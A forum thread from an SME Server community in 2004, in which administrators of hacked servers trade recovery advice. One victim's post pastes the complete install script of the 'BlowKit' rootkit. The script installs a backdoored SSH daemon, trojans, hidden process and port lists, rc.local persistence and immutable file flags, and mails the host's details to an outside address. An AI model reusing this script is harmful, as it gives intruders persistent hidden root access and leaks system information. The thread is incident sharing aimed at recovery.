Koozali.org: home of the SME Server

5.6 Hacked/Rooted, Trying to recover

Anonymous

5.6 Hacked/Rooted, Trying to recover
« Reply #30 on: April 09, 2004, 03:32:25 PM »
Quote
I had contribs installed, but they were nothing out of the ordinary -- including AWStats, Backup2WS, Damien Curtains Email SSL Contrib, Disk Utilization, CLAMD AV and thats it I think.

I was running 3 sites that included an installation of Mambo Open Source (a CMS), Gallery on another IBAY (pictures)


Would you let us know what versions of all the above you had on, including what version of php?

Thanks

Anonymous

5.6 Hacked/Rooted, Trying to recover
« Reply #31 on: April 11, 2004, 06:49:27 AM »
Quote from: "Anonymous"


What you've said so far only indicates that an account which has access to your web content (perhaps www) was compromised. It doesn't indicate that your system was rooted.

Please notify security@contribs.org.


Actually, If you read this whole thread, you would realize that I had already documented that I was rooted. The box was not able to boot up, commands in single user mode did not function, and my root password was changed. I think this equates to being rooted.

Brian

5.6 Hacked/Rooted, Trying to recover
« Reply #32 on: April 11, 2004, 06:50:11 AM »
Quote from: "Anonymous"
Quote
I had contribs installed, but they were nothing out of the ordinary -- including AWStats, Backup2WS, Damien Curtains Email SSL Contrib, Disk Utilization, CLAMD AV and thats it I think.

I was running 3 sites that included an installation of Mambo Open Source (a CMS), Gallery on another IBAY (pictures)


Would you let us know what versions of all the above you had on, including what version of php?

Thanks


I really couldnt say. The box has been formatted completely, and I didnt track version numbers on these contribs. Sorry.

Brian

Brian

Re: Maybe it was Mambo that was hacked
« Reply #33 on: April 11, 2004, 06:51:05 AM »
Quote from: "stancol"
http://www.net-security.org/vuln.php?id=3337


I am decently sure that I was running 1.0.4, now all of my machines are running the newest 1.0.5. Although, I could be wrong, and this could be the source.

Anonymous

5.6 Hacked/Rooted, Trying to recover
« Reply #34 on: April 11, 2004, 11:28:34 PM »
Thanks

Offline stancol

  • ***
  • 90
  • +0/-0
    • http://www.srcproductions.com
Who gets the booby prize?
« Reply #35 on: April 13, 2004, 01:21:53 AM »
Quote
To provide some incentive for someone to help me out, I am offering $50 via paypal to someone who can help me sort this out so I can just get the box up and running -- fixing the #1 problem is primary.

Brian


Just wondering who gets the $50? Not that I need $50 I'm way to rich for that. I've got more money than Bill Gates and some swamp land I'd love to unload.  :-D

(Thought the forms need a little humor they've been getting way to serious.)
What are the three dots for at the end of my signature file and why can't I get rid of them?These three dots right here >...

Offline Boris

  • *
  • 783
  • +0/-0
5.6 Hacked/Rooted, Trying to recover
« Reply #36 on: April 13, 2004, 10:38:55 AM »
Brian,
If you feel like it, you could just donate your money to contribs.org to support this forum and hosting.
We all will benefit from it :-)
Just an option and no obligations.
...

Offline stancol

  • ***
  • 90
  • +0/-0
    • http://www.srcproductions.com
Good Idea
« Reply #37 on: April 14, 2004, 05:09:23 AM »
Good idea wish I'd thought of it Boris. Oh well at least my post was funnier than yours.

:hammer:
What are the three dots for at the end of my signature file and why can't I get rid of them?These three dots right here >...

Ralph

Another Idea
« Reply #38 on: April 15, 2004, 10:36:55 PM »
I think booting from Knoppix cd, or installing the drive into another Red Hat box and copying the files is a great idea. However, in the future you may want to try this.

1. Clone the drive using Norton Ghost or whatever suits your fancy.

2. Then on the cloned drive, do an upgrade of the server, it will get you booted and access to MySQL and anything else including LOGS!.... This saved me many times.

3. It also allows you to scanvenge what you had and try o find the hacker. I would like to know how you were rooted, were you running Post Nuke or any other forks of PHP Nuke(if so what version)? There is a patch for the latest version of Post Nuke.

-Ralph

Anonymous

Re: Who gets the booby prize?
« Reply #39 on: April 19, 2004, 02:54:09 AM »
Quote from: "stancol"
Quote
To provide some incentive for someone to help me out, I am offering $50 via paypal to someone who can help me sort this out so I can just get the box up and running -- fixing the #1 problem is primary.

Brian


Just wondering who gets the $50? Not that I need $50 I'm way to rich for that. I've got more money than Bill Gates and some swamp land I'd love to unload.  :-D

(Thought the forms need a little humor they've been getting way to serious.)


I forgot about this. However, no one really "solved" my problem, just provided workarounds and ways to get the data, that I already knew and was trying. Regardless, I do appreciate everyone's help, so I am donating $25 to contribs! :)

Brian

Tom

Hacked System
« Reply #40 on: April 23, 2004, 08:52:22 PM »
I Have had 5 5.5 systems hacked and left in at state that the system would not start again,

On one of the system i was able to view the files and it seems all files were read only. and on the other servers the swap file was missing.

the systems had no other contribs loaded and were patched. i had remote access to them thought ssl and thats all.

I have now upgraded all other sites to 6 and no more attacks. i would like to know how they got in

Regards

Tom

iFX

What version should I upgrade to?
« Reply #41 on: June 19, 2004, 06:23:56 AM »
I was hacked by my own stupid fault... was too busy to update the old 5.5 server. Now I'm paying for it with days spent backing up finding a second temporary backup server etc...

How do I know it was hacked?
Well, the web server stopped running and when I tried to restart it, it kept failing. I checked the logs and noticed some Promiscuous mode devices or something (apparently a sign of something bad - I don't know much about this stuff, mostly a windows user, not a real admin)...  I then was having a look through the file system and noticed some files in the tmp directory:
kit/
kit.tgz
SSLROOT.GZ

The kit directory contained the contents of the kit.tgz file - I moved the files off the server on to my own PC to have a closer look - turned out to be a rootkit called Blow Kit...

I'm not sure what it did to my server, and because of that, I'm figuring it's just best to back up my data and re-install a new version of SME.

contribs.org had been down until today, so I only now found out about 6.0.1
And this morning I just finished downloading the 330MB+ ISO of 6.0.0 over a 56K dial up connection (as well as the 6.0 update RPMs).  Now that I've finished downloading that, contribs is back on-line and I notice people saying install 6.0.1!

DOH!  I just spent nearly 3 days downloading 6.0.0 over my slow dial up connection... What do you recommend? Should I dump 6.0 and download 6.0.1 (another 2-3 days) and install 6.0.1 rather than 6.0?

What are the advantages/ disadvantages?
I've spent the whole day (so far) searching through the forums, but can't decide what to do...  Are the latest 6.0 updates all I'll need?

By the way, here's the contents of the rootkit install file: (would this help in possibly reversing the damage it's done to the server without having to re-install?)
================
Code: [Select]
#!/bin/bash

BLK=''
RED=''
GRN=''
YEL=''
BLU=''
MAG=''
CYN=''
WHI=''
DRED=''
DGRN=''
DYEL=''
DBLU=''
DMAG=''
DCYN=''
DWHI=''
RES=''

unset HISTFILE
unset HISTSAVE
export HISTFILE=/dev/null
echo "${BLU} Welcome to BlowKit v2.0 (®mecanicus)"
if test -n "$1"; then
pass=$1
port=$2
mail=$3
else
echo "${BLU} ./install pass port mail "
echo "${WHI} Error..."
exit 0
fi
echo "${WHI} Freeing some resources and put some signs..."
echo "${WHI} |--------------------|100%"
pass=md5sum --string=$1 |awk -F ' ' ' {print $1} '
./touch /dev/.b
echo -n "${BLU}  ."
killall &>/dev/null -9 awk
echo -n "${BLU}."
killall &>/dev/null -9 rm
echo -n "${BLU}."
killall &>/dev/null -9 mv
echo -n "${BLU}."
killall &>/dev/null -9 cp
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo "${BLU}."
if [ -f "/dev/.b" ]; then
echo "Only for your info : a sign result (read diagnostic)"
./touch diagnostic
echo this rk was instaled in the past on this server!>>diagnostic
else
echo -n ""
fi
echo "${RED} -Done-"
echo "${WHI}  Next..."
echo ""
echo
echo "${WHI} Starting install sshd main backdoor"
echo "${WHI} |--------------------|100%"
./mv env /usr/bin/.env &>/dev/null
echo -n "${BLU} ."
echo -n "${BLU}."
/usr/bin/.env &>/dev/null
echo -n "${BLU}."
echo -n "${BLU}."
./replace 62cadae65f54888f214aa0673003ab59 $pass hdaf4
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
./replace 25000 $2 sshd_config
echo -n "${BLU}."
./mv hdaf4 /usr/sbin/ &>/dev/null
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
./mv sshd_config /usr/bin/000023 &>/dev/null
./cp .ham/* /usr/. &>/dev/null
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo "${BLU}."
echo "${RED} -Done-"
echo "${WHI}  Next..."
echo ""
echo "${WHI} Install some trojans!..."
echo "${WHI} |--------------------|100%"
echo -n "${BLU} ."
./mv blow /usr/bin/-bash &>/dev/null
/usr/sbin/hdaf4 -f /usr/bin/000023 -q
echo -n "${BLU}."
echo -n "${BLU}."
-bash &>/dev/null
echo -n "${BLU}."
./mkdir /usr/lib/.lib &>/dev/null
echo -n "${BLU}."
if [ -f "/usr/bin/gcc" ]; then
/usr/bin/gcc &>/dev/null -o netstatx2 netstatx.c
fi

if [ -f "netstatx2" ]; then
./rm &>/dev/null -rf netstatx
echo -n "${BLU}."
echo -n "${BLU}."
./mv netstatx2 netstatx &>/dev/null
fi
./cat > /usr/lib/.lib/libnh << EOF
60500
ircd
bash
ftp
under
ssh
33333
scan
6667
80.97
mycd
users
replace
install
.tmp
mec
X11f
.pid
25000
EOF
echo -n "${BLU}."
if [ -f "/etc/rc.d/rc.local" ]; then
echo "/usr/sbin/hdaf4 -f /usr/bin/000023 -q &>/dev/null">>/etc/rc.d/rc.local
echo ".env &>/dev/null">>/etc/rc.d/rc.local
echo "-bash &>/dev/null">>/etc/rc.d/rc.local
fi
./chattr &>/dev/null +isa /etc/rc.d/rc.local
echo -n "${BLU}."
./chattr &>/dev/null +isa /usr/bin/.env
./chattr &>/dev/null +isa /usr/bin/hdaf4
./chattr &>/dev/null +isa /bin/netstat
./chattr &>/dev/null +isa /usr/lib/.lib/libne
./chattr &>/dev/null +isa /usr/lib/.lib/libnh
./chattr &>/dev/null +isa /usr/bin/-bash
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo "${BLU}."
echo "${RED} -Done-"
echo "${WHI}  Next..."
echo ""
echo "${WHI} Sending a mail..."
echo "${WHI} |--------------------|100%"
if test -n "$3"; then
echo "${RED}Sending mail to $3"
echo -n "${BLU} ."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
./smail $1 $2 $3 | mail -s PuliKit burlac3l@yahoo.com
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
./s &>/dev/null
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo -n "${BLU}."
echo "${BLU}."
else
./s &>/dev/null
echo "${RED} No mail defined"
fi
echo "${RED} -Done-"
echo "${WHI}  Next..."
echo ""
echo "${WHI} Killling mad active pids..."
killall &>/dev/null -9 mv
killall &>/dev/null -9 smail
killall &>/dev/null -9 mail
killall &>/dev/null -9 cp
killall &>/dev/null -9 rm
killall &>/dev/null -9 touch
killall &>/dev/null -9 cat
killall &>/dev/null -9 replace
killall &>/dev/null -9 awk
killall &>/dev/null -9 mkdir
killall &>/dev/null -9 crypt
killall &>/dev/null -9 chmod
killall &>/dev/null -9 ln
./chattr -iau ln
./chattr -iau install
cd ..
kit/rm -rf kit*
echo "${RED} -Done-"
echo "${WHI} Finished..."

=====================

I don't really understand what that code above does... but maybe someone here can shed some light on it all ;)

Thanks for any advice you could give me.

iFX

Sorry...
« Reply #42 on: June 21, 2004, 06:15:27 AM »
Sorry, I'm an idiot... I didn't mean to post here - was supposed to go in the General area  :(

Ed

5.6 Hacked/Rooted, Trying to recover
« Reply #43 on: June 21, 2004, 09:51:28 PM »
Take the 6.0 iso image as a seed to rsync the 6.0.1.

http://mirror.contribs.org/smeserver/contribs/dmay/mitel/howto/rsync-smeserver-5.6dev.iso-howto.html
It's for 5.6 but it the same idea.

Ed

Anonymous

recovering drive
« Reply #44 on: June 22, 2004, 01:08:57 AM »
I am interested in how you restored your mysql. I too have a drive that will not boot, it cant find /ext3 (or something) I have the drive in a windows box and can read and pull data off of it. I just dont know how to add that data into the new install i have on a different box. Any ideas would be great!